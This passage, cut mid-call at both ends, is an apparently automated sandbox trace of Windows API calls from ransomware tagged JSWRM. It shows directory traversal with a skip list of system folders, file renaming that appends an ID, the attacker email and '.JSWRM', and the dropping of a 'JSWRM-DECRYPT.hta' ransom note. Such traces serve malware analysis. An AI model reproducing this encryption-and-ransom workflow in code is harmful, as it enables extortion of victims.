hHeap=0x1e0000) returned 1 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.176] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd86035, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x755f99d9, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2=".") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="..") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="...") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="windows") returned -1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="recovery") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="perflogs") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="documents and settings") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="system volume information") returned 1 [0069.176] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="msocache") returned 1 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll.mui", cchWideChar=16, lpMultiByteStr=0x240fc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wab32res.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll.mui", cchWideChar=16, lpMultiByteStr=0x2413d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wab32res.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0069.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.177] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9665669283073360) returned 0 [0069.177] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.177] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.177] CloseHandle (hObject=0xffffffff) returned 1 [0069.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0069.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.178] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.178] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd86035, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x755f99d9, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 0 [0069.178] FindClose (in: hFindFile=0x231cc0 | out: hFindFile=0x231cc0) returned 1 [0069.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0069.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0069.179] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fdc097c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fdc097c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.179] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0069.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0069.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.180] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="msadc", cAlternateFileName="")) returned 1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2=".") returned 1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="..") returned 1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="...") returned 1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="windows") returned -1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="recovery") returned -1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="perflogs") returned -1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="documents and settings") returned 1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="$RECYCLE.BIN") returned 1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="system volume information") returned -1 [0069.180] lstrcmpiW (lpString1="msadc", lpString2="msocache") returned -1 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\jswrm-decrypt.hta")) returned 0xffffffff [0069.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0069.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0069.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0069.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.185] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.186] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.186] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0069.187] CloseHandle (hObject=0x298) returned 1 [0069.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0069.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0069.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0069.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0069.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\jswrm-decrypt.hta")) returned 0x20 [0069.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0069.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0069.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.188] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fe5954c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0069.188] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.188] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fe5954c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="..", cAlternateFileName="")) returned 1 [0069.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.188] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2=".") returned 1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="..") returned 1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="...") returned 1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="windows") returned -1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="recovery") returned -1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="perflogs") returned -1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="documents and settings") returned -1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="$RECYCLE.BIN") returned 1 [0069.188] lstrcmpiW (lpString1="adcjavas.inc", lpString2="system volume information") returned -1 [0069.189] lstrcmpiW (lpString1="adcjavas.inc", lpString2="msocache") returned -1 [0069.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcjavas.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcjavas.inc", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adcjavas.inc", lpUsedDefaultChar=0x0) returned 12 [0069.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcjavas.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcjavas.inc", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adcjavas.inc", lpUsedDefaultChar=0x0) returned 12 [0069.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.190] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9168655667467808) returned 0 [0069.190] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.190] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.190] CloseHandle (hObject=0xffffffff) returned 1 [0069.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 